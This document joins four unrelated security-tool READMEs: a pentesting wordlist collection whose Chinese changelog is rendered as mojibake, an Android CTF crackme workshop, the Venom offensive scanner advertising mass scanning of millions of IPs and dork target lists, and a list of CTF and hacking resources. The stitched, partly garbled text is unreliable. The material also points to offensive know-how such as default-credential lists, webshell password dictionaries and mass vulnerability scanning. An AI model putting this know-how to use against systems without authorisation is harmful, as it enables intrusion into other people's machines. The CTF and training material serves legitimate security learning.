# Dictionary-Of-Pentesting ## ็ฎ€ไป‹ ๆ”ถ้›†ไธ€ไบ›ๅธธ็”จ็š„ๅญ—ๅ…ธ๏ผŒ็”จไบŽๆธ—้€ๆต‹่ฏ•ใ€SRCๆผๆดžๆŒ–ๆŽ˜ใ€็ˆ†็ ดใ€Fuzzing็ญ‰ๅฎžๆˆ˜ไธญใ€‚ ๆ”ถ้›†ไปฅๅฎž็”จไธบๅŽŸๅˆ™ใ€‚็›ฎๅ‰ไธป่ฆๅˆ†็ฑปๆœ‰่ฎค่ฏ็ฑปใ€ๆ–‡ไปถ่ทฏๅพ„็ฑปใ€็ซฏๅฃ็ฑปใ€ๅŸŸๅ็ฑปใ€ๆ— ็บฟ็ฑปใ€ๆญฃๅˆ™็ฑปใ€‚ ๆถ‰ๅŠ็š„ๅ†…ๅฎนๅŒ…ๅซ่ฎพๅค‡้ป˜่ฎคๅฏ†็ ใ€ๆ–‡ไปถ่ทฏๅพ„ใ€้€š็”จ้ป˜่ฎคๅฏ†็ ใ€HTTPๅ‚ๆ•ฐใ€HTTP่ฏทๆฑ‚ๅคดใ€ๆญฃๅˆ™ใ€ๅบ”็”จๆœๅŠก้ป˜่ฎคๅฏ†็ ใ€ๅญๅŸŸๅใ€็”จๆˆทๅใ€็ณป็ปŸๅฏ†็ ใ€Wifiๅฏ†็ ็ญ‰ใ€‚ ่ฏฅ้กน็›ฎ่ฎกๅˆ’ๆŒ็ปญๆ”ถ้›†ใ€‚ ## ๆ›ดๆ–ฐ่ฎฐๅฝ• **2021.06.06** 1. ๅขžๅŠ SuperWordlist็š„็”จๆˆทๅๅ’Œๅฏ†็ ๅญ—ๅ…ธใ€‚ๅŒ…ๆ‹ฌTomcatใ€PMAใ€DEV็ญ‰ๅฏ†็ ๅญ—ๅ…ธ๏ผŒ่ฟ˜ๆœ‰CNใ€EN้‚ฎ็ฎฑ็”จๆˆทๅใ€TOP20็ฎก็†็”จๆˆทๅใ€‚ 2. 200ไธ‡ๅญๅŸŸๅๅญ—ๅ…ธ **2021.06.02** 1. ๅขžๅŠ 43ไธชไบ‘wafๆˆ–cdnๅˆ—่กจ **2021.05.28** 1. ๅขžๅŠ wappalyzer็š„ๆŒ‡็บน่ง„ๅˆ™ **2021.04.28** 1. XXE payloads for specific DTDs **2021.04.26** 1. ๅขžๅŠ ไบ‘ๅŽ‚ๅ•†็š„metadataๆœ‰็”จ็š„ไธ€ไบ›ๅœฐๅ€ใ€‚๏ผˆๅŒ…ๅซAWSใ€Google Cloudใ€Digital Ocean ใ€Packetcloudใ€Azureใ€Oracle Cloud ใ€Alibabaใ€OpenStack/RackSpace ใ€Oracle Cloudใ€Kubernetes๏ผ‰ **2021.02.19** 1. ๅขžๅŠ aem่ทฏๅพ„ๅˆ—่กจ **2021.02.07** 1. ๅขžๅŠ top25 ๆผๆดžๅ‚ๆ•ฐ(SQLI/XSS/RCE/OPENREDIRECT/LFI/SSRF) **2021.02.04** 1. ๅขžๅŠ all.txt ๅญ—ๅ…ธใ€‚ **2021.02.03** 1. ๅขžๅŠ amass็š„ๅญๅŸŸๅๅญ—ๅ…ธใ€‚ **2021.01.31** 1. ๅขžๅŠ AllAboutBugBounty้กน็›ฎ็š„ๆ–‡ๆกฃ **2021.01.27** 1. ๅขžๅŠ ๅ‡ ไธชๅฏ่ƒฝๅฏผ่‡ดRCE็š„็ซฏๅฃ **2021.01.24** 1. ๅขžๅŠ ไธคไธชgithub dork **2021.01.16** 1. ๅขžๅŠ cve็š„ไธ€ไบ›่ทฏๅพ„ 2. ไธ€ไบ›ๅทฒ็Ÿฅ้”™่ฏฏ้…็ฝฎ็š„่ทฏๅพ„ 3. ไธ€ไบ›API็ซฏ็‚นๆˆ–ๆœๅŠกๅ™จไฟกๆฏ็š„็‰นๆฎŠ่ทฏๅพ„ 4. ไปฅไธŠ3็ง็š„ๅˆ้›†๏ผˆๅŽป้‡ๅŽ๏ผ‰ **2021.01.13** 1. ๅขžๅŠ callbackๅ‚ๆ•ฐๅญ—ๅ…ธ 2. ๅขžๅŠ ๅธธ่งๆŠฅ้”™ไฟกๆฏๅญ—็ฌฆไธฒๅˆ—่กจ 3. ๅขžๅŠ debugๅ‚ๆ•ฐๅญ—ๅ…ธ 4. ๅขžๅŠ snmpๅฏ†็ ๅญ—ๅ…ธ 5. ๅขžๅŠ weblogicๅธธ่ง็”จๆˆทๅๅฏ†็  6. ๅขžๅŠ oracle็”จๆˆทๅใ€ๅฏ†็ ๅญ—ๅ…ธ **2021.01.04** 1. ๅขžๅŠ DefaultCreds-cheat-sheet **2021.01.03** 1. ๅขžๅŠ crackstationไธ‹่ฝฝๅœฐๅ€๏ผˆ็”ฑไบŽๅญ—ๅ…ธๅคชๅคง๏ผŒ็ป™ๅ‡บไธ‹่ฝฝ้“พๆŽฅ๏ผ‰ใ€‚ 2. ๅขžๅŠ rockyouๅญ—ๅ…ธใ€‚ 3. ๅขžๅŠ cainๅญ—ๅ…ธใ€‚ **2021.01.02** 1. ๅขžๅŠ webshellๅฏ†็ ๅญ—ๅ…ธ 2. ๅขžๅŠ 7wๅ’Œ81ไธ‡่ฏทๆฑ‚ๅ‚ๆ•ฐๅญ—ๅ…ธ 3. ๅขžๅŠ Lcoalhostๅœฐๅ€ๅญ—ๅ…ธ 4. HTMLๆ ‡็ญพๅˆ—่กจ **2020.12.31** 1. ๅขžๅŠ ๅŸŸ่ดฆๆˆทๅผฑๅฏ†็ ๅญ—ๅ…ธ๏ผˆ7000+๏ผ‰ **2020.12.30** 1. ๅขžๅŠ ntlm้ชŒ่ฏ็š„่ทฏๅพ„ **2020.12.15** 1. ๅขžๅŠ github dork็š„ๆœ็ดข่„šๆœฌใ€‚ **2020.12.09** 1. ๅขžๅŠ CEH web services็š„็”จๆˆทๅๅ’Œๅฏ†็ ๅญ—ๅ…ธใ€‚ **2020.12.07** 1. ๅขžๅŠ oracle่ทฏๅพ„ๅˆ—่กจ **2020.11.23** 1. ๅขžๅŠ ctfๅญ—ๅ…ธใ€‚ 2. ๅขžๅŠ ๆ‘„ๅƒrtsp้ป˜่ฎค่ทฏๅพ„ๅ’Œ้ป˜่ฎค็”จๆˆทๅๅ’Œๅฏ†็  **2020.11.14** 1. ๅขžๅŠ 1ไธชics ้ป˜่ฎคๅฏ†็ ๅญ—ๅ…ธ 2. ๅขžๅŠ 1ไธช่ฎพๅค‡้ป˜่ฎคๅฏ†็ ๅญ—ๅ…ธ๏ผˆ3400ไฝ™ๆก๏ผ‰ **2020.11.04** 1. ๅขžๅŠ  Wordpress BruteForc List **2020.11.03** 1. ๅขžๅŠ ๅ‡ ไธช้ป˜่ฎคๅฃไปค **2020.10.15** 1. ๅขžๅŠ ไธ€ไบ›payload **2020.09.30** 1. ๅขžๅŠ ๅธธ่งๅฏไปฅRCE็š„็ซฏๅฃ **2020.09.29** 1. bugbounty oneliner rce 2. ไธ€ไบ›้ป˜่ฎค่ทฏๅพ„ 3. top 100k ๅฏ†็ ๅญ—ๅ…ธ 4. top 5k ็”จๆˆทๅๅญ—ๅ…ธ 5. ไธ€ไบ›ไปฃ็ ๅฎก่ฎกๆญฃๅˆ™่กจ่พพๅผ **2020.09.27** 1. ๅขžๅŠ cms่ฏ†ๅˆซๆŒ‡็บน่ง„ๅˆ™้›†๏ผŒๅŒ…ๅซ fofa/Wappalyzer/WEBEYE/webไธญ้—ดไปถ/ๅผ€ๅ‘่ฏญ่จ€ ็ญ‰ไผ—ๅคšๆŒ‡็บนๅบ“ๅ†…ๅฎน **2020.09.22** 1. ไฟฎๆ”นswaggerๅญ—ๅ…ธ๏ผŒๆทปๅŠ 5ๆก่ทฏๅพ„ **2020.09.21** 1. ๅขžๅŠ 3็ง็ฑปๅž‹ๅฏ†็ ๅญ—ๅ…ธ๏ผŒๆ‹ผ้Ÿณใ€็บฏๆ•ฐๅญ—ใ€้”ฎ็›˜ๅฏ†็ ๅญ—ๅ…ธ 2. ๅขžๅŠ scada ้ป˜่ฎคๅฏ†็ ๏ผŒ็กฌ็ผ–็ ็ญ‰ๅˆ—่กจ **2020.09.18** 1. ๅขžๅŠ 11k+็”จๆˆทๅๅฏ†็ ็ป„ๅˆ **2020.09.17** 1. ๅขžๅŠ actionๅŽ็ผ€ top 100 2. javascript ไธญonไบ‹ไปถๅˆ—่กจ 3. URL 16่ฟ›ๅˆถfuzz **2020.09.15** 1. ๅขžๅŠ XXE bruteforce wordlist 2. ๅขžๅŠ sqlๅค‡ไปฝๆ–‡ไปถๅๅญ—ๅ…ธ 3. ๅˆ ้™ค้‡ๅค็š„spring bootๅ†…ๅฎน **2020.09.10** 1. ๅขžๅŠ ่‡ชๅทฑๆ”ถ้›†็š„webservicesๅ†…ๅฎนใ€‚ๅŒ…ๅซwebservices็›ฎๅฝ•๏ผŒๆ–‡ไปถๅ๏ผŒๆ‹“ๅฑ•ๅใ€‚ๅŽ็ปญ่ฎกๅˆ’ๅขžๅŠ ๅญ˜ๅœจๆผๆดžwebservices่ทฏๅพ„ๅ†…ๅฎน 2. readmeไธญๅขžๅŠ ๆ›ดๆ–ฐๅŽ†ๅฒ **2020.09.09** 1. ๅขžๅŠ weblogic่ทฏๅพ„ 2. ๅขžๅŠ swagger่ทฏๅพ„ 3. ๅขžๅŠ graphql่ทฏๅพ„ 4. ๅขžๅŠ spring-boot่ทฏๅพ„ 5. ๅŽปๆŽ‰device/default_password_list.txtๆ–‡ไปถไธญ็š„็ฉบ่กŒ **2020.09.08** 1. ๆ›ดๆ–ฐjsFileDict.txtๅญ—ๅ…ธ๏ผŒๅขžๅŠ 4ไธชjsๆ–‡ไปถๅ **2020.09.07** 1. ๆทปๅŠ ็ป•่ฟ‡ip้™ๅˆถ็š„http่ฏทๆฑ‚ๆŠ• 2. ไฟฎๆ”นreadme.md **2020.08.29** 1. ๅขžๅŠ ๅธธ่ง่ฎพๅค‡ใ€ๅฎ‰ๅ…จไบงๅ“้ป˜่ฎคๅฃไปค 2. ๅขžๅŠ ไธ€่กŒๅ‘ฝไปค็š„BugBounty tips 3. ๅขžๅŠ ไธคๅค„ๅ‚ๆ•ฐๅญ—ๅ…ธ 4. ๅขžๅŠ bruteforce-lists็š„ๅญ—ๅ…ธ 5. Readme ๆ–‡ไปถๅขžๅŠ ๆฅๆบใ€‚้€ๆธๅฎŒๅ–„ใ€‚ **2020.08.28** 1. ๅขžๅŠ api่ทฏๅพ„ 2. ๅขžๅŠ jsๆ–‡ไปถ่ทฏๅพ„ 3. ๅขžๅŠ http่ฏทๆฑ‚ๅ‚ๆ•ฐ 4. ๅขžๅŠ http่ฏทๆฑ‚ๅ‚ๆ•ฐๅ€ผ **2020.08.27** 1. ๅˆ ้™คไธ€ไบ›ๅคšไฝ™ๆ–‡ไปถ 2. ็ฒพ็ฎ€Filesไธ‹็š„dict็š„ๅฑ‚็บง 3. ๅขžๅŠ DirBusterๅญ—ๅ…ธ 4. ๅขžๅŠ spring boot actuatorๅญ—ๅ…ธ **2020.08.26** ้ฆ–ๆฌกๆไบค ## ๆฅๆบ&่‡ด่ฐข๏ผˆๆŽ’ๅไธๅˆ†ๅ…ˆๅŽใ€‚็›ฎๅ‰่ฟ˜ไธๅ…จ๏ผŒไผš้™†็ปญๅฎŒๅ–„๏ผ‰ ่ฏฅ้กน็›ฎๅ†…ๅฎนๅ‡ๆฅๆบไบŽ็ฝ‘็ปœๆˆ–่‡ชๅทฑๆ•ด็†๏ผŒๆ„Ÿ่ฐขๅ„ไฝๅคงไฝฌไปฌ็š„ๅ…ฑไบซ็ฒพ็ฅžๅ’Œ่พ›่‹ฆไป˜ๅ‡บ~ * [https://github.com/maurosoria/dirsearch](https://github.com/maurosoria/dirsearch) * [https://github.com/dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) * [https://github.com/internetwache/CT_subdomains](https://github.com/internetwache/CT_subdomains) * [https://github.com/lijiejie/subDomainsBrute](https://github.com/lijiejie/subDomainsBrute) * [https://github.com/shmilylty/OneForAll](https://github.com/shmilylty/OneForAll) * [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists) * [https://github.com/dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) * [https://github.com/OfJAAH/KingOfBugBountyTips](https://github.com/OfJAAH/KingOfBugBountyTips) * [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists) * [https://github.com/TheKingOfDuck/fuzzDicts](https://github.com/TheKingOfDuck/fuzzDicts) * [https://github.com/NS-Sp4ce/Dict](https://github.com/NS-Sp4ce/Dict) * [https://github.com/s0md3v/Arjun](https://github.com/s0md3v/Arjun) * [https://github.com/fuzzdb-project/fuzzdb](https://github.com/fuzzdb-project/fuzzdb) * [https://github.com/YasserGersy/Enums/](https://github.com/YasserGersy/Enums/) * [https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf](https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf) * [https://twitter.com/DanielAzulay18/status/1304751830539395072](https://twitter.com/DanielAzulay18/status/1304751830539395072) * [https://github.com/cwkiller/Pentest_Dic](https://github.com/cwkiller/Pentest_Dic) * [https://github.com/huyuanzhi2/password_brute_dictionary](https://github.com/huyuanzhi2/password_brute_dictionary) * [https://github.com/Clear2020/icsmaster/](https://github.com/Clear2020/icsmaster/) * [https://github.com/LandGrey/SpringBootVulExploit](https://github.com/LandGrey/SpringBootVulExploit) * [https://github.com/al0ne/Vxscan][https://github.com/al0ne/Vxscan] * [https://github.com/L0kiii/FofaScan](https://github.com/L0kiii/FofaScan) * [https://github.com/nw01f/CmsIdentification-masterV2](https://github.com/nw01f/CmsIdentification-masterV2) * [https://github.com/Lucifer1993/cmsprint](https://github.com/Lucifer1993/cmsprint) * [https://github.com/erwanlr/Fingerprinter](https://github.com/erwanlr/Fingerprinter) * [https://github.com/lewiswu1209/fingerprint](https://github.com/lewiswu1209/fingerprint) * [https://github.com/shelld3v/RCE-python-oneliner-payload](https://github.com/shelld3v/RCE-python-oneliner-payload) * [https://twitter.com/ptswarm/status/1311310897592315905](https://twitter.com/ptswarm/status/1311310897592315905) * [https://github.com/xer0days/BugBounty](https://github.com/xer0days/BugBounty) * [https://twitter.com/ptswarm/status/1323266632920256512](https://twitter.com/ptswarm/status/1323266632920256512) * [https://github.com/kongsec/Wordpress-BruteForce-List/](https://github.com/kongsec/Wordpress-BruteForce-List/) * [https://github.com/nyxxxie/awesome-default-passwords](https://github.com/nyxxxie/awesome-default-passwords) * [https://github.com/arnaudsoullie/ics-default-passwords](https://github.com/arnaudsoullie/ics-default-passwords) * [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar) * [https://github.com/pwnfoo/NTLMRecon](https://github.com/pwnfoo/NTLMRecon) * [https://github.com/chroblert/domainWeakPasswdCheck](https://github.com/chroblert/domainWeakPasswdCheck/) * [https://github.com/gh0stkey/Web-Fuzzing-Box](https://github.com/gh0stkey/Web-Fuzzing-Box) * [https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm) * [https://github.com/ihebski/DefaultCreds-cheat-sheet](https://github.com/ihebski/DefaultCreds-cheat-sheet) * [https://github.com/epony4c/Exploit-Dictionary](https://github.com/epony4c/Exploit-Dictionary) * [https://github.com/ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths) * [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) * [https://github.com/daffainfo/AllAboutBugBounty](https://github.com/daffainfo/AllAboutBugBounty) * [https://github.com/OWASP/Amass](https://github.com/OWASP/Amass) * [https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056) * [https://github.com/lutfumertceylan/top25-parameter](https://github.com/lutfumertceylan/top25-parameter) * [https://github.com/clarkvoss/AEM-List](https://github.com/clarkvoss/AEM-List) * [https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb](https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb) * [https://raw.githubusercontent.com/GoSecure/dtd-finder/master/list/xxe_payloads.md](https://raw.githubusercontent.com/GoSecure/dtd-finder/master/list/xxe_payloads.md) * [https://raw.githubusercontent.com/AliasIO/wappalyzer/master/src/technologies.json](https://raw.githubusercontent.com/AliasIO/wappalyzer/master/src/technologies.json) * [https://github.com/fuzz-security/SuperWordlist](https://github.com/fuzz-security/SuperWordlist) * [https://wordlists.assetnote.io/](https://wordlists.assetnote.io/)
# CyberTruckChallenge22 Android security workshop taught at the CyberTruck Challenge 2022 (Michigan USA). Further info at https://www.cybertruckchallenge.org ## Description A new mobile remote keyless system "CyberTruck" has been implemented by one of the most well-known car security companies "NowSecure Mobile Vehicles". The car security company has ensured that the system is entirely uncrackable and therefore attackers will not be able to recover secrets within the mobile application. If you are an experienced Android reverser, then enable the `tamperproof` button to harden the application before unlocking your cars. Your goal will consist on recovering up to 6 secrets in the application. ## Material The content is provided in folders such as: - `slides`: Presentation during the Android workshop (~2h) - `docker`: Docker image with all tools ready - `apk`: Final Android crackme APK which can unlock up to 3 vehicles. - `src`: Source code of the crackme - `notes`: Additional notes, troubleshooting, and so on - `solutions`: Possible solutions to the crackme (x86 and Aarch64) - `student`: JS code provided as template to write your Frida hooks - `img:`: Screenshots of the crackme running on the Android emulator ## Mobile CTF: Android Crackme It is required to have an Android device either emulated or physical. During the workshop we employed an AVD running Android 11 that it can be obtained for free with Android Studio. Additionally, the tamperproof check needs to have the Frida server binary placed in `/data/local/tmp/frida-server`. ![logo](img/cybertruckMobileKeyless2.png) ### Challenge1 to unlock car1. "DES key: Completely Keyless. Completely safe" - `50pts`: There is a secret used to create a DES key. Can you tell me which one? - `100pts`: There is a token generated at runtime to unlock the carid=1. Can you get it? (flag must be submitted in hexa all lowercase) ### Challenge2 to unlock car2: "AES key: Your Cell Mobile Is Your Key" - `50pts`: This challenge has been obfuscated with ProGuard, therefore you will not recover the AES key. - `100pts`: There is a token generated at runtime to unlock the carid=2. Can you get it? (flag must be submitted in hexa all lowercase) ### Challenge3 to unlock car3. "Mr Truck: Unlock me Baby!" - `50pts`: There is an interesting string in the native code. Can you catch it? - `100pts`: Get the secret generated at runtime to unlock the carid=3. Security by obscurity is not a great design. Use real crypto! (hint: check the length when submitting the secret!) ### Contact Eduardo Novella <[email protected]> ### Public Write-ups - [verso.se](https://www.revers0.xyz/posts/cybertruck) (by [Joan Calabrรฉs](https://twitter.com/jcalabres22)) - [bugbountywriteup](https://medium.com/bugbountywriteup/cybertruck-challenge-2019-android-ctf-e39c7f796530) (by [Harshit Maheshwari](https://twitter.com/fake_batman_)) - [GitHub](https://github.com/user1342/CyberTruck-2019-Android-CTF-Writeup) (By [James Stevenson](https://twitter.com/_JamesStevenson)) - [GitHub.io](https://nibarius.github.io/learning-frida/2020/08/17/cybertruckchallange19) (by [Nibarius](https://github.com/nibarius)) - [GitHub.io (native layer)](https://nibarius.github.io/learning-frida/2020/08/22/cybertruckchallange19-revisited) (by [Nibarius](https://github.com/nibarius)) - [alp.run](https://alp.run/2021/02/09/cybertruckchallenge19_writeup.html) (by [Alp Eren](https://twitter.com/isik_erenalp))
# Venom ![venom](venom.png) #### Offensive Security Framework for Vulnerability Scanning & Pentesting ![os](https://img.shields.io/badge/OS-Linux,%20Windows-green.svg) [![pythonver](https://img.shields.io/badge/python-3.6%2B-green.svg)](https://www.python.org/downloads/release/python-3614) [![License: GPLV3](https://img.shields.io/badge/License-GPLv3-green.svg)](https://www.gnu.org/licenses/gpl-3.0) [![Docker Pulls](https://img.shields.io/docker/pulls/vittring/venom.svg)](https://hub.docker.com/r/vittring/venom/) [![Docker Image Size](https://img.shields.io/docker/image-size/vittring/venom.svg?sort=date)](https://hub.docker.com/r/vittring/venom/) [![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black) > **Warning**: Version 4.3.3 now requires PROXIES/VPN. ##### Features - [x] Cloudflare Resolver [Cloudbuster] - [x] LFI->RCE and XSS Scanning [LFI to RCE & XSS] - [x] SQL Injection Vuln Scanner [SQLi] - [x] Extremely Large D0rk Target Lists - [x] Detects known WAFs - [x] AdminPage Finding - [x] CCTV/Networked Interfaces discovery [WIP] <<<< - [x] Vulnerable FTPs Scanner [Toxin] - [x] DNS Bruteforcer - [x] Python 3.6 asyncio based scanning - [x] Cloudflare resolver - [x] Extremely quick "Toxin" Vulnerable IP scanner to scan potentially millions of ips for known vulnerable services. - [x] Free and Open /src/ - [x] Cross-platform Python-based toolkit - [x] Licensed under GPLv3 - [x] Built by hackers with full transparency - [x] No more issues with dependencies from pre-alpha release ![Example of SQLi Dorker](https://github.com/v3n0m-Scanner/V3n0M-Scanner/blob/master/src/AnimatedDemo.gif?raw=true "Example of Dorker Features") **This is outdated.** **NOTE:** You MUST install these on Ubuntu and Kali. Ubuntu users: Please make sure you `sudo apt-get install python3-bs4` | `apt-get install python3-setuptools` Kali users: Please `apt-get install python3-dev` | `apt-get install python-dev` **NOTE:** Install Poetry for deps: `curl -sSL https://install.python-poetry.org | python3 - poetry install # install deps poetry update # when you want to check for deps updates` Docker users: Please see [Dockerfile](docker/README.md) ## Contact Information: Submit a bug report/pull request with prefix "Query" at the start. ## Credits to: - Architect for the initial encouragement and support in V3n0ms early days - SageHack for allowing Cloudbuster to be adapted for use within V3n0M - D35m0nd142 for allowing Collaboration and the use of LFI Suite within V3n0M - b4ltazar & all members of darkc0de.com for inspiring the project with darkd0rk3r ## Make Love and Smoke Trees.
# Hacking Resources CTF chall write-ups, files, scripts etc to go with my video walkthroughs **[HERE](https://www.youtube.com/@_CryptoCat)** A challenge that takes 10 hours to solve, takes 10 minutes to explain :) # CTF **[CTFTime](https://ctftime.org)**<br> **[OverTheWire](https://overthewire.org/wargames)**<br> **[PicoCTF](https://play.picoctf.org)**<br> **[ImaginaryCTF](https://imaginaryctf.org)**<br> **[Intigriti Monthly XSS](https://challenge.intigriti.io)**<br> **[247CTF](https://247ctf.com)**<br> **[CTF Challenge](https://ctfchallenge.com)**<br> **[CTF Learn](https://ctflearn.com)**<br> **[CryptoHack](https://cryptohack.org)**<br> **[Google CTF](https://capturetheflag.withgoogle.com)**<br> **[HackThisSite](https://www.hackthissite.org)**<br> **[SmashTheStack](http://smashthestack.org/wargames.html)**<br> **[W3Challs](https://w3challs.com/challenges)**<br> **[Ringzer0CTF](https://ringzer0ctf.com/challenges)**<br> **[Enigma Group](https://www.enigmagroup.org)**<br> **[Root Me](https://www.root-me.org)**<br> **[SecurityValley CTF](https://ctf.securityvalley.org)**<br> **[Game Hacking](https://github.com/mrT4ntr4/CTF-Game-Challenges)**<br> **[Mobile](https://github.com/xtiankisutsa/awesome-mobile-CTF)** # Pentesting **[HackTheBox](https://affiliate.hackthebox.com/cryptocat-htb)**<br> **[TryHackMe](https://tryhackme.com)**<br> **[OffSec Proving Grounds](https://www.offensive-security.com/labs)**<br> **[Web Security Academy](https://portswigger.net/web-security)**<br> **[OWASP Juice Shop](https://github.com/juice-shop/juice-shop-ctf)**<br> **[Damn Vulnerable Web Application (DVWA)](https://github.com/digininja/DVWA)**<br> **[AWSGoat: Damn Vulnerable AWS](https://github.com/ine-labs/AWSGoat)**<br> **[AzureGoat: Damn Vulnerable Azure](https://github.com/ine-labs/AzureGoat)**<br> **[Damn Vulnerable DeFi](https://www.damnvulnerabledefi.xyz)**<br> **[Ethernaut: Web3/Solidity Hacking](https://ethernaut.openzeppelin.com)**<br> **[Hacker 101](https://ctf.hacker101.com)**<br> **[PentesterLab](https://pentesterlab.com)**<br> **[VulnHub](https://www.vulnhub.com)**<br> **[VulnMachines](https://www.vulnmachines.com)**<br> **[HackingLab](https://www.hacking-lab.com/index.html)**<br> **[CyberSecLabs](https://www.cyberseclabs.co.uk)**<br> **[UnderTheWire](https://underthewire.tech/wargames)**<br> **[HackXOR](https://hackxor.net)**<br> **[Hacktoria](https://hacktoria.com)** # Pwn / RE **[Pwn.College](https://pwn.college)**<br> **[ROP Emporium](https://ropemporium.com)**<br> **[Exploit Education](https://exploit.education)**<br> **[How2Heap](https://github.com/shellphish/how2heap)**<br> **[GuidedHacking](https://guidedhacking.com)**<br> **[Pwnables](https://pwnable.tw/challenge)**<br> **[Deusx64](https://deusx64.ai)**<br> **[Roppers Academy](https://roppers.org/collections)**<br> **[Azeria Labs](https://azeria-labs.com/writing-arm-assembly-part-1)**<br> **[Reversing Challenges](https://challenges.re)**<br> **[Begin RE](https://www.begin.re)**<br> **[CrackMes](https://crackmes.one)** # Blue Team **[LetsDefend](https://letsdefend.io)**<br> **[Blue Team Labs Online](https://blueteamlabs.online)**<br> **[Cyber Defenders](https://cyberdefenders.org)**<br> **[Attack Defense](https://attackdefense.com)**<br> **[Immersive Labs](https://dca.immersivelabs.online)** # Videos **[LiveOverflow](https://www.youtube.com/playlist?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN)**<br> **[John Hammond](https://www.youtube.com/c/JohnHammond010)**<br> **[IppSec](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)**<br> **[XCT](https://www.youtube.com/channel/UClGm2C8Qi0_Wv68zfjCz2YA)**<br> **[Gynvael](https://www.youtube.com/user/GynvaelEN)**<br> **[ZetaTwo](https://www.youtube.com/c/ZetaTwo)**<br> **[PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A)**<br> **[0xdf](https://www.youtube.com/channel/UChO9OAH57Flz35RRX__E25A)**<br> **[BBRE](https://www.youtube.com/@BugBountyReportsExplained)**<br> **[CTBB podcast](https://www.youtube.com/@criticalthinkingpodcast)**<br> **[0xdf](https://www.youtube.com/channel/UChO9OAH57Flz35RRX__E25A)**<br> **[247CTF](https://www.youtube.com/channel/UCtGLeKomT06x3xZ2SZp2l9Q)**<br> **[MalFind](https://www.youtube.com/channel/UCJf4-reOhoiAlScWC1WzLgQ)**<br> **[DayZeroSec](https://www.youtube.com/c/dayzerosec)**<br> **[Rana Khalil](https://www.youtube.com/c/RanaKhalil101)**<br> **[PinkDraconian](https://www.youtube.com/channel/UCmXwpkCXmIKjoRLMsq9I3RA)**<br> **[Superhero1](https://www.youtube.com/channel/UCm2SwKmx3Ya1HG5RmHR7SCA)**<br> **[S1lk](https://www.youtube.com/c/AlexChaveriat)**<br> **[Alh4zr3d](https://www.youtube.com/channel/UCz-Z-d2VPQXHGkch0-_KovA)**<br> **[Paweล‚ ลukasik](https://www.youtube.com/c/PawelLukasik)**<br> **[Ephemeral](https://www.youtube.com/c/BasteG0d69)**<br> **[Hak5](https://www.youtube.com/c/hak5)**<br> **[GuidedHacking](https://www.youtube.com/channel/UCCMi6F5Ac3kQDfffWXQGZDw)**<br> **[Stephen Chapman](https://www.youtube.com/channel/UCqfqH-wq12WOm4QG4KiRisw)**<br> **[Conda](https://www.youtube.com/c/c0nd4)**<br> **[HackerSploit](https://www.youtube.com/c/HackerSploit)**<br> **[Condingo](https://www.youtube.com/c/codingo)**<br> **[InsiderPhd](https://www.youtube.com/c/InsiderPhD)**<br> **[HackSplained](https://www.youtube.com/c/Hacksplained)**<br> **[TheCyberMentor](https://www.youtube.com/c/TheCyberMentor)**<br> **[StackSmashing](https://www.youtube.com/c/stacksmashing)**<br> **[Cybersecurity Meg](https://www.youtube.com/c/CybersecurityMeg)**<br> **[Tib3rius](https://www.youtube.com/c/Tib3rius)**<br> **[SecAura](https://www.youtube.com/channel/UCx89Lz24SEPZpExl6OfQ0Gg)**<br> **[DarkSec](https://www.youtube.com/c/DarkSec)**<br> **[Hexorcist](https://www.youtube.com/c/HEXORCIST)**<br> **[PwnCollege](https://www.youtube.com/c/pwncollege)**<br> **[NahamSec](https://www.youtube.com/c/Nahamsec)**<br> **[LaurieWired](https://www.youtube.com/@lauriewired)**<br> **[Optional](https://www.youtube.com/c/optionalctf)**<br> **[TheHackerish](https://www.youtube.com/c/thehackerish)**<br> **[SloppyJoePirates](https://www.youtube.com/@SloppyJoePirates)**<br> **[AlmondForce](https://www.youtube.com/c/AlmondForce)**<br> **[VulnMachines](https://www.youtube.com/c/vulnmachines)**<br> **[More](https://securitycreators.video)**<br> **[Even More..](https://www.youtube.com/c/CryptoCat23/channels?view=56&shelf_id=0)** # Tools **[Ghidra](https://ghidra-sre.org/CheatSheet.html)**<br> **[Volatility](https://github.com/volatilityfoundation/volatility/wiki/Linux)**<br> **[PwnTools](https://github.com/Gallopsled/pwntools-tutorial)**<br> **[CyberChef](https://gchq.github.io/CyberChef)**<br> **[DCode](https://www.dcode.fr/en)**<br> **[Decompile Code](https://www.decompiler.com)**<br> **[Run Code](https://tio.run)**<br> **[GTFOBins](https://gtfobins.github.io)**<br> **[ExploitDB](https://www.exploit-db.com)**<br> **[OffsecTools](https://offsec.tools)**<br> **[RevShells](https://revshells.com)** # More Resources **[Bug Bounty Platforms](https://github.com/disclose/bug-bounty-platforms)**<br> **[HackTricks](https://book.hacktricks.xyz/pentesting-methodology)**<br> **[CTF Resources](https://github.com/apsdehal/awesome-ctf)**<br> **[Security Resources](https://github.com/CompassSecurity/security_resources)**<br> **[Bug Bounty Resources](https://www.hacker101.com/resources)**<br> **[Seal9055 Resources](https://github.com/seal9055/resources)**<br> **[Forensics](https://cugu.github.io/awesome-forensics)**<br> **[Learn RE](https://hshrzd.wordpress.com/how-to-start)**<br> **[Learn BinExp](https://guyinatuxedo.github.io)**<br> **[HTB Writeups](https://0xdf.gitlab.io)**
